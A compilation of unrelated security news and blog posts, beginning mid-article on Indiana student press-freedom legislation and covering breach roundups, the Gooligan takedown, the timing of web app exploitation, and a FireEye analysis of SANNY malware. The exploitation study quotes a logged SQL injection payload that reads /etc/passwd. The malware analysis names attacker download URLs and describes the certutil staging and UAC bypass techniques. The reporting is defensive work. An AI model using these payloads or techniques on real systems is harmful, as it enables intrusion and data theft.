Ed Clere, a member of the Indiana House of Representatives, thinks this a huge problem. “Most people would have been proud to have student journalists who could produce work of that caliber,” he said of the Shakedown’s dating and relationships issue. Nothing the Plainfield High School student journalists have done or published, he said, has justified the censorship and “over the top” reaction that has ensued.

For two Indiana State Congress sessions, Clere has introduced legislation that would protect the free speech rights of student journalists across the state. It would have prohibited schools from encroaching on students’ speech rights except in very specific situations.

The bill reads: “This chapter may not be construed to authorize or protect content of school sponsored media by a student journalist that:(1) is libelous or slanderous; (2) violates federal or state law; (3) incites students to: (A) create a clear and present danger of the commission of an unlawful act; (B) violate a public school or school corporation policy; or (C) be disruptive of the operation of the public school; or (4) encourages, promotes, or supports behavior contrary to citizenship or moral instruction required under IC 20-30-5.”

House Bill 1016 was supported by many student journalists, including Anu Nattam, who testified in its favor, as well as teachers and administrators. But organizations including the Indiana School Boards Association and the Indiana Association of Public School Superintendents, fiercely opposed the bill. It died narrowly in the House on February 5, 2018.

Since a similar bill had failed the year before, Clere knew he was facing an uphill battle, but he was still surprised at the level of resistance and opposition the legislation encountered.

Clere cited a 1988 Supreme Court case that limited student publication freedom, Hazelwood School District v. Kuhlmeier, as a “big step backward” for the First Amendment rights of young journalists. “[School board superintendents and principals] like the absolute control they enjoy under Hazelwood. They don’t want to give it up.”

Indiana is far from the only state in which legislators, students, and teachers are fighting together to grant speech protections to student journalists. Clere said that efforts in Indiana are part of an initiative by the Student Press Law Center—a network, called New Voices, of state campaigns to pass such legislation.

Some states, including California, Montana, and Illinois, have successfully enacted New Voices legislation like Clere’s Bill 1016. But most states have not.

In Indiana, Clere isn’t giving up. Assuming he is re-elected, he vowed that he would “keep trying, and keep bringing this legislation back as long as I am able.” While he is open to discussion and addressing some of the concerns of school administrators, he said he is not open to watering down the bill to the point where it is meaningless.

“This is about more than journalism education and student publications,” Clere said. “Censorship of student journalists hurts entire school communities. It deprives them of the important and relevant stories and conversations that benefit all students.”

Nattam agrees. “People need to realize that by limiting press freedom for students, they are limiting their education. That’s what I feel like was done to me and my staff—our education was compromised, because we can’t be put in the same environment as a professional journalist. So, we can’t prepare for a career in journalism if that's what we choose to do.”

“If anything, this whole thing has fueled my passion for journalism,” Nattam said. “The press is how the public stays informed.”

Critical Infrastructure Under Attack

Security researchers have long shared their concerns about potential cyberattacks on critical infrastructure systems. Over the past few weeks, there have been several reports highlighting the dangers of such attacks. According to the New York Times, investigators believe that a cyberattack against a petrochemical plant in Saudi Arabia in August last year was intended to not only sabotage the plant’s operations but also cause an explosion that could have killed people. The only thing that reportedly prevented the explosion was a mistake in the computer code used by the attackers. Experts believe that a nation-state attacker was responsible, given that there was no obvious financial motivation from the attack. Also this month, the US accused Russia of a wide-ranging cyber-assault on its energy grid and other parts of its critical infrastructure, with many of the reported tactics resembling the Dragonfly 2.0 campaign, in which hackers infiltrated energy facilities in North America and Europe.

We are at an alarming point in terms of our critical infrastructure security, where governments around the world are on high alert to the potential for damaging attacks. The head of the UK’s National Cyber Security Centre (NCSC) warned in January that he expects the UK to suffer a major, crippling cyberattack against its national critical infrastructure during the next two years.

Nation state attackers are well aware of the political fallout that could arise as a result of dangerous cyberattacks on control networks, and so it is imperative that security issues within these systems are addressed urgently.

Industrial control systems at risk

The National Cyber Security Centre is right to be concerned about potential cyberattacks against UK critical infrastructure. Across all parts of critical national infrastructure, we are seeing a greater number of sophisticated and damaging cyber threats which are often believed to be the work of foreign governments seeking, it is alleged, to cause everything from mischief through to political upheaval. While offering many benefits in terms of productivity and visibility, the greater connectivity arising from the Internet of Things has also exposed many industrial control systems to a range of damaging cyberattacks. For example, DDoS attacks can be used to disrupt the availability of critical services, while simultaneously allowing attackers to plant damaging, or as in the Saudi case even weaponized, malware. Last October’s DDoS attacks against the transport network in Sweden caused train delays and disrupted travel services, while the WannaCry ransomware attacks last May demonstrated the capacity for cyberattacks to impact people’s access to essential services. The current cyber security landscape has changed almost beyond recognition – ten years ago, only the most Orwellian futurists would have predicted that major national elections would be manipulated by cyberattacks.

What’s next?

The pressure is now on for the cyber security community and governments to act on this issue to defend against this apparent increase in nation state attacks. The NIS Directive with the UK/EU and the NIST framework in the US present a golden opportunity to improve critical infrastructure cyber security. But to be truly effective, these regulations must compel operators of essential services to deliver higher levels of cyber security and require that these essential services remain available during an attack. As seen in recent days with Facebook and Cambridge Analytica, it won’t matter if infrastructure operators claim ‘tick-box’ regulatory compliance as their defence if their essential service has failed to remain open for business during a nation state sponsored cyber-attack.

To find out more, contact us.

CERTs, CSIRTs and SOCs after 10 years from definitions

Nowadays is hard to give strong definitions on what are the differences between Security Operation Centers (SOC), Computer Emergency Response Teams (CERT) and Computer Security Incident Response Teams (CSIRT) since they are widely used in many organisations accomplishing very closed and similar tasks. Robin Ruefle (2007) on her paper titled "Defining Computer Security Incident Response Teams" (Available here) gave us a nice idea. She also admits (at the end of the paper) there is not such a strong difference between those common terms: CSIRT, CERT, CSIRC, CIRT, IHT. Her conclusion made me thinking about how this topic has been evolving over the past 10 years.  

Despite her amazing work on defining (let me call) CSIRTs I would give you more details on how those teams have been evolving over the past decade based on my personal experiences directly to the field. Indeed after being involved on building several CERTs, organising CSIRTs and evaluating SOCs I started to spot strong and soft similarities between those teams. Today I'd like to share with you those strong and soft similarities without talking about "differences" since there are not evidence on differences at all.

Each team is asked for CyberSecurity incidents but each team holds specific aims and respond to cybersecurity incident in a specific way. Every team needs to understand what happened after a cybersecurity related incident and this is the very strong common point that every team takes care of: deeply understand what happened. Nobody is better then other or nobody is more addicted respect to other in understanding what really happened during an incident, every team have fully autonomy to figure out what happened through inspection and analytical skills.  The weak similarities come after the initial understanding (analysis) phase. CSIR Teams ad SOC Teams usually study the related incident looking for a response while CERT usually tries to forecast incidents. The definition of response highlight the "weak similarities" between CSIRT and SOC. 

CSIRT usually (but not necessary) look to the incident with a "business" perspective taking care of (but not limited to): communication countermeasures, policy creations, insurance calls, business impact analysis, technical skillset and off course taking care about technical mitigations. For example a CSIRT would evaluate according to the marketing area a communication strategy after a successful incident hit the company, or it could call insurances to evaluate if they will cover some damages or again it could interact to HR area to define missing skillsets in the organisation. Off course it is able to interact with defensive technologies but it's only one ste of its tasks.

A SOC usually (but not necessary) look to the incident with a more "technical" perspective taking care of (but not limited to): incident forensic, log analysis, vendor calls, patch distributions, vulnerability management and software/hardware tunings.  For example after an incident happened to an organisation its SOC would try to block it involving all its resources to block the threat by acting on peripheral devices or running commands directly on user's machines. The SOC deeply understands SIEM technology and it is able to improve it, it is also able to use and to interact through defensive teams and/or technology like sandboxes, proxy, WAF as well. The SOC team holds strong network oriented capabilities.

CER Teams usually take care about incidents following the community sharing procedures such as (but not limited to): feeds, bulletin, Index of Compromises and applying effective governance actions to local IT/SOC teams enabling them to mitigate the incident in the fastest way possibile. CERT team members work a lot with global incidents understanding new threats and tracking known threat movements. They usually work with Threat Intelligence Platforms and with high level dashboard to better understand the evolution of threats to forecast new attacks.

CERTs and SOCs are usually focused on prevention such as (but not limited to): what are the best rules to apply ? What are the procedures in case of incidents ? They are really focused on using threat intelligence in order to spot attack and to block incidents. On the other hand CERTs and CSIRTs are mostly focused on Guidelines and business impact analysis while SOCs and CSIRTs really need to follow incident response procedures in order to apply their high technical skills to mitigate the attack. The following image tries to highlight the main (but not the only) keywords that you would probably deal if you work on a SOC a CERT or in a CSIRT.

The main ideas (but not the only ones) behind the 3 teams could be summed up in the following terms: Mitigation (belongs to SOC), Response (belongs to CSIRT) and Alerting-Prevention (belongs to CERT). I'd like to point out that mitigation and response are quite different concepts. Indeed mitigation holds a technical view of the resolution, response holds a more business view of the resolution. While mitigating an incident means to "take it down" and so to restore the attacked system as it was before the incident, an incident response could include more sophisticated actions that could include the board of director in the decision process as well.
Similar teams but with strong attitudes need different professional profiles. Usually (but again not necessary) SOC Teams need more technical profiles which includes hard skills such as: vendor based certifications, network oriented attitudes and forensic attitudes. CSIRT teams needs a mixup profiles more oriented to technical skills but also with business view such as: risk evaluation, guideline buildings and communication skills. CERTs need to have a wide landscape vision about threats and for such a reason they need to know threat intelligence, they need to know prevention tools and to be part of strong IoC sharing communities. Developer skills are not mandatory on those teams but if "weak and dirty" scripting skills are in place, the entire team will benefit from them. Automation and integration are widely needed on such a teams and a scripting profile would create such an integrations.

As mentioned at the beginning of this "post" it is hard ...  almost impossible ... to give hard definitions about the evolution of "CSIRTs" but it's possible to observe strong and weak similarities in order to better understand what team is most suitable for every organisation.  If you belongs to a "CSIRT" or to a "SOC" or to a "CERT" and you feel like you are doing a little bit of each team according to my post, well, it is ok ! In ten years "things" have been changed a lot from the original definitions  and it's quite normal being involved in hybrid teams.

Weekly Cyber Risk Roundup: Orbitz Breach, Facebook Privacy Fallout

One of the biggest data breach announcements of the past week belonged to Orbitz, which said on Tuesday that as many as 880,000 customers may have had their payment card and other personal information compromised due to unauthorized access to a legacy Orbitz travel booking platform.

“Orbitz determined on March 1, 2018 that there was evidence suggesting that, between October 1, 2017 and December 22, 2017, an attacker may have accessed certain personal information, stored on this consumer and business partner platform, that was submitted for certain purchases made between January 1, 2016 and June 22, 2016 (for Orbitz platform customers) and between January 1, 2016 and December 22, 2017 (for certain partners’ customers),” the company said in a statement.

Information potentially compromised includes payment card information, names, dates of birth, addresses, phone numbers, email addresses, and gender.

As American Express noted in its statement about the breach, the affected Orbitz platform served as the underlying booking engine for many online travel websites, including and travel booked through Amex Travel Representatives.

Expedia, which purchased Orbitz in 2015, did not say how many or which partner platforms were affected by the breach, USA Today reported. However, the company did say that the current site was not affected.


Other trending cybercrime events from the week include:

  • State data breach notifications: Island Outdoor is notifying customers that payment card information may have been stolen due to the discovery of malware affecting several of its websites. Agemni is notifying customers about unauthorized charges after “a single authorized user of our software system used customer information to make improper charges for his personal benefit.” The Columbia Falls School District is notifying parents of a cyber-extortion threat involving their children’s personal information. Intuit is notifying TurboTax customers that their accounts may have been accessed by an actor leveraging previously leaked credentials. Taylor-Dunn Manufacturing Company is notifying customers that it discovered cryptocurrency mining malware on a server and that a file containing personal information of those registered for the Taylor-Dunn customer care or dealer center may have been accessed. Nampa School District is notifying a “limited number” of employees and Skamania Public Utility District is notifying customers that their personal information may have been compromised due to incidents involving unauthorized access to an employee email account.
  • Data exposed: A flaw in Telstra Health’s Argus software, which is used by more than 40,000 Australian health specialists, may have exposed the medical information of patients to hackers. Primary Healthcare is notifying patients of unauthorized access to four employee email accounts. More than 300,000 Pennsylvania school teachers may have had their personal information publicly released due to an employee error involving the Teacher Management Information System.
  • Notable ransomware attacks: The city of Atlanta said a ransomware attack disrupted internal and customer-facing applications, which made it difficult for citizens to pay bills and access court-related information. Atrium Hospitality is notifying 376 hotel guests that their personal information may have been compromised due to a ransomware infection at a workstation at the Holiday Inn Sacramento. Finger Lakes Health said it lost access to its computer system due to ransomware infection.
  • Other notable events: Frost Bank said that malicious actors comprised a third-party lockbox software program and were able to access images of checks that were stored in the database. National Lottery users are being advised to change their passwords after 150 accounts were affected by a “low-level” hack. A lawsuit against Internet provider CenturyLink and AT&T-owned DirecTV alleges that customer data was available through basic Internet searches.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.


Cyber Risk Trends From the Past Week

2018-03-24_RiskScoresFacebook has faced a week of criticism, legal actions, and outcry from privacy advocates after it was revealed that the political consulting Cambridge Analytica had accessed the information of 50 million users and leveraged that information while working with the Donald Trump campaign in 2016.

“Cambridge Analytica obtained the data from a professor at the University of Cambridge who had collected the information by creating a personality-quiz app in 2013 that plugged into Facebook’s platform,” The Wall Street Journal reported. “Before a policy change in 2015, Facebook gave app creators and academics access to a treasure trove of data, ranging from which pages users liked to details about their friends.”

It isn’t clear how many other developers might have retained information harvested from Facebook before the 2015 policy change, The Journal reported. However, Mark Zuckerberg said the company may spend “many millions of dollars” auditing tens of thousands of data collecting apps in order to get a better handle on the situation.

The privacy breach has already led to regulatory scrutiny and potential lawsuits around the globe. Bloomberg reported that the FTC is probing whether data handling violated terms of a 2011 consent decree. In addition, Facebook said it would conduct staff-level briefings with six congressional committees in the coming week. Some lawmakers have called for Zuckerberg to testify as well, and Zuckerberg told media outlets that he would be willing to do so if asked.

Facebook’s stock price has dropped from $185 to $159 over the past eight days amid the controversy, and several companies have suspended their advertising on Facebook or deleted their Facebook pages altogether due to the public backlash.

Taking down Gooligan part 3 — monetization and clean-up

This post provides an in-depth analysis of Gooligan monetization schemas and recounts how Google took it down with the help of external partners.

This post is the final post of the series dedicated to the hunt and take down of Gooligan that we did at Google in collaboration with Check Point in November 2016. The first post recounts the Gooligan origin story and offers an overview of how it works. The second one provides an in-depth analysis of Gooligan’s inner workings and an analysis of its network infrastructure. As this post builds on the previous two, I encourage you to read them if you haven’t done so already.

This series of posts is modeled after the talk I gave on the subject at Botconf in December 2017. Here is a recording of the talk:

You can also get the slides here , but they are pretty bare.


Gooligan’s goal was to monetize the infected devices through two main fraudulent schemas: Ad fraud and Android app boosting.

Ad fraud

Gooligan Fraudulent ads pop up

As shown in the screenshot above, periodically Gooligan will use its root privileges to overlay an ad popup for a legitimate app on top of any activity the user was currently doing. Under the hood, Gooligan knows when the user is looking at the phone, as it monitors various key events, including when the screen is turned on.

We don’t have much insight on how effective those ad campaigns were or who was reselling them, as they don’t abuse Google’s ads network, and they use a gazillion HTTP redirects, which makes attribution close to impossible. However we believe that ad fraud was the main driver of Gooligan revenue, given its volume and the fact that we blocked its fake installs as discussed below.

App Boosting

The second way Gooligan attempted to monetize infected devices was by performing Android app boosting. An app boosting package is a bundle of searches for a specific query on the Play store, followed by an install and a review. The search is used in an attempt to rank the app for a given term. This tactic is commonly peddled in App Store Optimization (ASO) guides.

Example of Play Store boosting service

The reason Gooligan went through the trouble of stealing OAuth tokens and manipulating the Play store is probably that the defenses we put in place are very effective at detecting and discounting fake synthetic installs. Using real devices with real accounts was the Gooligan authors’ attempt to evade our detection systems. Overall, it was a total failure on their side: We caught all the fake installs, and suspended the abusive apps and developers.

Play Store Fraud Diagram

As illustrated in the diagram above, the app boosting was done in four steps:

  1. Token stealing: The malware extracts the phone’s long term token from the phone’s accounts.

  2. Taking order: Gooligan reports phone information to the central command and control system, and receives in response a reply telling it which app to boost, including which search term to use and which comment to leave (if any). Phone information is exfiltrated because Gooligan authors also had access to non-compromised phones and were trying to use information obtained from Gooligan to fake requests from those phones.

  3. Token exchange: The long term token is exchanged for a short term token that allows Gooligan to access the Play store. We are positive that no user data was compromised by Gooligan, as no other data was ever requested by Gooligan.

  4. Boosting: The fake search, installation, and potential review is carried out through the manipulated Play store app.


Cleaning up Gooligan was challenging for two reasons: First, as discussed in the infection post , its reset persistence mechanism meant that doing a factory reset was not enough to clean up the old unpatched devices. Second, the Oauth tokens had been exfiltrated to Gooligan servers.

Asking users to reflash their devices would have been unreasonable and issuing an OTA (Over The Air) update would have take too long. Given this difficult context and the need to act quickly to protect our users we went for an alternative solution that we rarely use: orchestrating a takedown with the help of third parties.


Gooligan sinkhole efficiency chart

With the help of Shadowserver foundation and domain registrars we sinkholed Gooligan domains and got them to point to Shadowserver controlled IPs instead of IPs controlled by Gooligan authors. This sinkholing ensured that infected devices couldn’t exfiltrate token or receive fraud commands, as they would connect to sinkhole servers instead of the real command and control servers. As shown in the graph above, our takedown was very successful: It blocked over 50M attempts to connect to Gooligan’s control server in 2017.


Example of Notifications sent to Gooligan victims

With the sinkhole in place, the second part of the remediation involved resecuring the accounts that were compromised, by disabling the exfiltrated tokens and notifying the users. Notification at that scale is very complex, for three key reasons:

  • Reaching users in a timely fashion across a wide range of devices is difficult. We ended up using a combination of SMS, email, and Android messaging, depending on what communication channel was available.

  • It was important to make the notification understandable and useful to all users. Explaining what was happening clearly and simply took a lot of iteration. We ended up with the notification shown in the screenshot above.

  • Once crafted, the text of the notification and help page had to be translated into the languages spoken by our users. Performing high quality internationalization for over 20 languages very quickly was quite a feat.


Overall, in order to respond to Gooligan, many people, including myself, ended up working long hours through the Thanksgiving weekend (an important holiday in the U.S.). Our commitment to quickly eradicate this threat paid off: On the evening of Monday, November 29th, the takedown took place, followed the next day by the resecuring of the compromised accounts. All in all, this takedown took a mere few days, which is blazing fast when you compare it to other similar ones. For example, the Avalanche botnet ) takedown took four years of intensive efforts.

To conclude, Gooligan was a very challenging malware to tackle, due to its scale and unconventional tactics. We were able to meet this challenge and defeat it, thanks to a cross-industry effort and the involvement of many teams at Google that didn’t go home until users were safe.

Thanks for reading this post all the way to the end. I hope it showcases how we approach botnet fighting and sheds some light on some of the lesser known, yet still critical, activities that our research team assists with.

Thank you for reading this post till the end! If you enjoyed it, don’t forget to share it on your favorite social network so that your friends and colleagues can enjoy it too and learn about Gooligan.

To get notified when my next post is online, follow me on Twitter , Facebook , Google+ , or LinkedIn . You can also get the full posts directly in your inbox by subscribing to the mailing list or via RSS .

A bientôt!

How to download your Facebook data

With all the news about Facebook recently, you might be wondering, what exactly does Facebook know about me from my profile? Sure, you can peruse your profile online, but that doesn’t tell the whole story. One way to see what Facebook has on you is to download your Facebook data.

The ability to download your Facebook data isn’t really new, but not many users know that you can do it. It only takes a few minutes; how long depends on how big your data files are. Here are the steps to download your Facebook data.

If you’ve decided that you want to leave Facebook completely, here’s how to delete, disable, or limit your Facebook account.

To read this article in full, please click here

Life Cycle of a Web App 0 Day


Over the past few months, I’ve been monitoring the proliferation of exploits for some of my disclosed WordPress Plugin and Joomla Extension vulnerabilities against Akamai customers. I started this observation process which leads to an expected conclusion – severe vulnerabilities like SQL Injection, RFI and LFI would receive the most attention for any CMS platform. While less severe vulnerabilities such as XSS and path disclosure would likely receive less attention from the attackers.

The initial idea was to track three of my own disclosures after they had been published and see how much time elapsed until they were weaponized and attempts were made to exploit them in the wild. In total, I had released three previously unknown SQL injection vulnerabilities in three well known Joomla extensions. These aforementioned vulnerabilities had been remedied by the original authors prior to research being published, These disclosures appeared to go unnoticed by the black hat community.

This paper examines the time elapsed between a when a vulnerability is publicly disclosed until we begin to observe widespread exploitation attempts by adversaries.

What Happened

The three disclosed vulnerabilities were released last September listed in the following table. Each advisory details a SQL Injection vulnerability that does not require the attacker to have a login on the target’s website:

DateDescriptionCVE ID
2016-09-16Huge-IT Portfolio Gallery Plugin v1.0.6CVE-2016-1000124
2016-09-15Huge-IT Video Gallery v1.0.9CVE-2016-1000123
2016-09-16Huge-IT Catalog v1.0.7 for Joomla

After nearly a year, I decided to investigate what might be causing my disclosures to be ignored. I looked at other SQL injection vulnerabilities in Joomla extensions that were turning up in Akamai’s attack logs and found an obvious difference. While my advisories had permeated the usual exploit curator websites, like, they had not made it over to, and Two days after submitting all three exploits to I found a hit in Akamai’s logs. The attack attempt originated from IP address belonging to a telecommunications company in North Africa. They were targeting a .mil website with the SQL injection in Huge IT portfolio v1.0.9 using SQLmap.

Path: ajax_url.php
Query: QmX=6156 AND 1=1 UNION ALL SELECT 1,NULL,'alert("XSS")',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')
User-Agent: sqlmap/ (

A second attack occurred five days later. This time the attacker targeted a Russian e-commerce site, by attempting to redirect the malicious requests through a popular online auction house. The requests appear to be looking for other injection points, since each request placed a single quote, ‘ at a different query parameter.

Query: option=com_catalog&_sacat=&_ex_kw='A=0&_mPrRngCbx=1&_udlo=&_udhi=&_sop=12&_fpos=&_fspt=1&_sadis=&LH_CAds=&task=viewitem&secid=13&id=34&Itemid=10&rmvSB=true


It seemed that the malicious actors would use exploit-db and CXsecurity websites specifically as their RSS feed of vetted working exploits. Conversely, while advisories published on packetstorm were quite relevant to the information security industry as a whole, they were not formatted into easily consumable exploits as curated by websites like exploit-db and their ilk. Not to leave the most popular CMS out of the fun I also publically disclosed a path traversal vulnerability in a WordPress plugin named Membership Simplified [CVE-2017-1002008]. I released the details on March 14th 2017 and began seeing entries in our logs on Saturday, March 18, 2017 at 9:00:00 PM just four days later. This response time was in stark contrast to my Joomla extension publications.

Why are newly disclosed WordPress plugin vulnerabilities so aggressively pursued? One possible theory is that there are multiple open source tools and frameworks available to scan for plugin vulnerabilities on WordPress websites. These freely available tools are lacking for the Joomla platform.

It is not just the severity of the vulnerability but the proliferation of the software platform that increases its target footprint. WordPress has an enormous market share of the content management software in production on the internet. There are entire frameworks, websites and even companies focused on WordPress core and plugin security.

What about a truly severe vulnerability? Something that doesn’t require authentication and allows the attacker to change content, possibly even execute code?

Earlier this year a researcher at Sucuri, Marc Montipas released a vulnerability affecting WordPress < 4 .7.2. The vulnerability abuses a type juggling bug where any non-integer input bypasses the authentication mechanism allowing a remote unauthenticated attacker to modify any blog post.

I started monitoring attack traffic, via Akamai log files, for this specific vulnerability immediately after it had been made public. The WordPress JSON API vulnerability was assigned CVE-ID CVE-2017-1001000. It first popped up in our attack logs on Wed, 01 Feb 2017 18:00:00 GMT or around 1PM EST just three hours after Sucuri made their blog post public on their site.

It only took three hours after the vulnerability went public to see exploit attempts against Akamai customers turning up in the logs. I’ve noticed the logs after a few months show only a few thousand attempts per day primarily targeting government and military websites. Also, most of the log entries were being generated by the customer themselves. In addition to this, large portions of these scans originate from security companies performing web application security assessments for said customers. The log entries that didn’t originate from a security company or the target’s own DMZ appeared to be POST requests rather than GET. This I assume to minimize noise and attempt to bypass WAF filters as there were many ways to deliver the JSON payload when exploiting this vulnerability.

Shortly after the disclosure by Marc and Securi an article was published stating that over 1.5 million websites had been compromised using this vulnerability. Why am I not seeing the same widespread exploitation attempts against Akamai customers? The answer was simple, the majority of Akamai customers aren’t running WordPress and the attackers were using google dorks to determine which sites were.

A google dork is an advanced search method used to increase Google’s search granularity. To get a quick idea on how many websites out there rely on WordPress I ran the following:

An example, searching google for urls that contain the string /wp-content:


Returns “About 280,000,000 results”.

In an attempt to further my examination of these attacks, I examined other exploits against Joomla, as it is the second most popular CMS employed by internet websites. I found that, again SQL injection and path traversal vulnerabilities were the most popular. the top of the Joomla examples are listed here, but I primarily focus on WordPress because of its deep penetration into the content management ecosystem.

I discovered with attacks focusing on Joomla extensions the majority of the traffic originated from Virtual Private Servers (VPS) and appeared to be legitimate attack attempts. The logs revealed the opposite for wordpress, the majority of attack attempts originated from the target’s DMZ and were self scans.


The com_rpl at the top of the above table is the result of an SQL injection via the pid parameter of a GET request in an extension called RealtyNA CRM (Client Relationship Management). This is designed to help Joomla based real estate websites manage inquiries on property for sale. The associated vulnerability was disclosed on December 15th 2016 and does not require the attacker to be authenticated to the site. It should be noted that the extension is no longer actively being maintained and has been pulled from Joomla’s code repository. The vendor RealtyNA has directed Joomla users towards its new WordPress plugin.

Most of the above Joomla extensions are vulnerable to SQL injection. When automated tools like SQLmap are used they iterate through various payload types in an attempt to build a working SQL injection exploit. This is why the numbers are much higher than the wordpress table below, SQLi attacks are much more noisier than XSS or RFI.

Besides software popularity, the type of exploit, for example, an “Unrestricted File Upload” vulnerability isn’t going to trigger a WAF alert unless a rule was specifically written for it. As an example, a file upload vulnerability can be more severe than an path traversal vulnerability but it is not likely to set off nearly as many alarms when it is being exploited as it’s harder to fingerprint being an error in the code logic itself. The exploit is a normal looking POST request void of any malicious content. Unless your file payload is something obvious like the notorious c99.php web shell.

With WordPress running on 28.7% of all websites and Joomla coming in at second place with 3.3% the availability of website security assessment applications also follows this trend. There are various utilities to assess the security of your WordPress and Joomla websites, a few are listed below that are popular.

Application NameCMSProject Page
Joomla VSJoomla

The majority of utilities out there appear to run on the command line, while some are directly integrated into your CMS installation.

The logs which I collected retain attack data for 30 days, I examined recently released vulnerabilities and well-known vulnerabilities to study the most scanned for a 30 day period. I filtered out known penetration testing companies from the logs and removed logs where the connection originated from the targets own network. The Alerts field contains the number of actual payloads that were blocked by Akamai’s WAF, they do not contain benign probe requests from web application vulnerability scanners.


When examining the log entries for the Jetpack WordPress plugin I expected to see in most of the entries an attempt to exploit SQL injection or a local file inclusion vulnerability. Or perhaps even the latest vulnerability in jetpack to be disclosed by Sucuri, a stored XSS vulnerability. The majority of the scans appeared to just verify if jetpack had been installed. If it was installed further checks were made for the existence of specific files like class.jetpack-xmlrpc-server.php or example.html, this it seems was an attempt to exploit CVE-2014-0173 a bypass vulnerability allowing unrestricted access to some of the RPC calls packaged with WordPress.

The majority of plugins being scanned for have been public for many months, in some cases years. Why do scans continue for legacy vulnerable plugins? The reason is vulnerability assessment tools scan for the existence of all known vulnerable plugins, usually by testing for a known specific file that it is packaged with.
Plugin Security – Now

I started re-evaluating plugin security a year later by using the same previous methodology of downloading plugins and manually examining the PHP code for common vulnerabilities like SQLi, XSS, LFI, and RFI. I found plugins that have not been updated in several months pose the most risk. I also discovered plugins with less than 1000 downloads but more than 100 haven’t been updated in an average of 991 days, as of the time of writing, or almost three years. The average plugin from my sample data hasn’t been updated in 1050 days.

# Plugin DownloadsAvg Days Since Last Update
9,999,999 - 1,000,000150
999,999 - 100,000458
99,999 - 10,000941
9,999 - 1,0001296
999 - 100991
< 99107*

* This is because these are newly uploaded plugins actively being developed.


When I originally began my research into the aforementioned type of widespread exploitation of recently published vulnerabilities I had some expectations as to how it would turn out. I had expected the same categories of vulnerabilities across all platforms to receive equal amounts of attention. What I found was that specific vulnerabilities like LFI were favored over other vulnerabilities that I had expected to be more popular such as SQL injection.

What I did not expect is the amount of traffic generated by widespread deployment of scanning tools by enterprise IT staff. While it appears the multiple routine daily self scans appear excessive, at least they’re focused on their own site’s security. With the proliferation of new vulnerability scanning tools becoming readily available it’s important that software is audited and vulnerabilities are reported responsibly, fixed and publicly disclosed. This cycle of research, repair and publish is the current best way to keep systems safe and secure.

The post Life Cycle of a Web App 0 Day appeared first on Liquidmatrix Security Digest.

SANNY Malware Delivery Method Updated in Recently Observed Attacks


In the third week of March 2018, through FireEye’s Dynamic Threat Intelligence, FireEye discovered malicious macro-based Microsoft Word documents distributing SANNY malware to multiple governments worldwide. Each malicious document lure was crafted in regard to relevant regional geopolitical issues. FireEye has tracked the SANNY malware family since 2012 and believes that it is unique to a group focused on Korean Peninsula issues. This group has consistently targeted diplomatic entities worldwide, primarily using lure documents written in English and Russian.

As part of these recently observed attacks, the threat actor has made significant changes to their usual malware delivery method. The attack is now carried out in multiple stages, with each stage being downloaded from the attacker’s server. Command line evasion techniques, the capability to infect systems running Windows 10, and use of recent User Account Control (UAC) bypass techniques have also been added.

Document Details

The following two documents, detailed below, have been observed in the latest round of attacks:

MD5 hash: c538b2b2628bba25d68ad601e00ad150
SHA256 hash: b0f30741a2449f4d8d5ffe4b029a6d3959775818bf2e85bab7fea29bd5acafa4
Original Filename: РГНФ 2018-2019.doc

The document shown in Figure 1 discusses Eurasian geopolitics as they relate to China, as well as Russia’s security.

Figure 1: Sample document written in Russian

MD5 hash: 7b0f14d8cd370625aeb8a6af66af28ac
SHA256 hash: e29fad201feba8bd9385893d3c3db42bba094483a51d17e0217ceb7d3a7c08f1
Original Filename: Copy of communication from Security Council Committee (1718).doc

The document shown in Figure 2 discusses sanctions on humanitarian operations in the Democratic People’s Republic of Korea (DPRK).

Figure 2: Sample document written in English

Macro Analysis

In both documents, an embedded macro stores the malicious command line to be executed in the TextBox property (TextBox1.Text) of the document. This TextBox property is first accessed by the macro to execute the command on the system and is then overwritten to delete evidence of the command line.

Stage 1: BAT File Download

In Stage 1, the macro leverages the legitimate Microsoft Windows certutil.exe utility to download an encoded Windows Batch (BAT) file from the following URL: http://more.1apps[.]com/1.txt. The macro then decodes the encoded file and drops it in the %temp% directory with the name: 1.bat.

There were a few interesting observations in the command line:

  1. The macro copies the Microsoft Windows certutil.exe utility to the %temp% directory with the name: ct.exe. One of the reasons for this is to evade detection by security products. Recently, FireEye has observed other threat actors using certutil.exe for malicious purposes. By renaming “certutil.exe” before execution, the malware authors are attempting to evade simple file-name based heuristic detections.
  2. The malicious BAT file is stored as the contents of a fake PEM encoded SSL certificate (with the BEGIN and END markers) on the Stage 1 URL, as shown in Figure 3.  The “certutil.exe” utility is then leveraged to both strip the BEGIN/END markers and decode the Base64 contents of the file. FireEye has not previously observed the malware authors use this technique in past campaigns.

Figure 3: Malicious BAT file stored as an encoded file to appear as an SSL certificate

BAT File Analysis

Once decoded and executed, the BAT file from Stage 1 will download an encoded CAB file from the base URL: hxxp://more.1apps[.]com/. The exact file name downloaded is based on the architecture of the operating system.

  • For a 32-bit operating system: hxxp://more.1apps[.]com/2.txt
  • For a 64-bit operating system: hxxp://more.1apps[.]com/3.txt

Similarly, based on Windows operating system version and architecture, the CAB file is installed using different techniques. For Windows 10, the BAT file uses rundll32 to invoke the appropriate function from update.dll (component inside

  • For a 32-bit operating system: rundll32 update.dll _EntryPoint@16
  • For a 64-bit operating system: rundll32 update.dll EntryPoint

For other versions of Windows, the CAB file is extracted using the legitimate Windows Update Standalone Installer (wusa.exe) directly into the system directory:

The BAT file also checks for the presence of Kaspersky Lab Antivirus software on the machine. If found, CAB installation is changed accordingly in an attempt to bypass detection:

Stage 2: CAB File Analysis

As described in the previous section, the BAT file will download the CAB file based on the architecture of the underlying operating system. The rest of the malicious activities are performed by the downloaded CAB file.

The CAB file contains the following components:

  • install.bat – BAT file used to deploy and execute the components.
  • ipnet.dll – Main component that we refer to as SANNY malware.
  • ipnet.ini – Config file used by SANNY malware.
  • NTWDBLIB.dll – Performs UAC bypass on Windows 7 (32-bit and 64-bit).
  • update.dll – Performs UAC bypass on Windows 10.

install.bat will perform the following essential activities:

  1. Checks the current execution directory of the BAT file. If it is not the Windows system directory, then it will first copy the necessary components (ipnet.dll and ipnet.ini) to the Windows system directory before continuing execution:

  2. Hijacks a legitimate Windows system service, COMSysApp (COM+ System Application) by first stopping this service, and then modifying the appropriate Windows service registry keys to ensure that the malicious ipnet.dll will be loaded when the COMSysApp service is started:

  3. After the hijacked COMSysApp service is started, it will delete all remaining components of the CAB file:

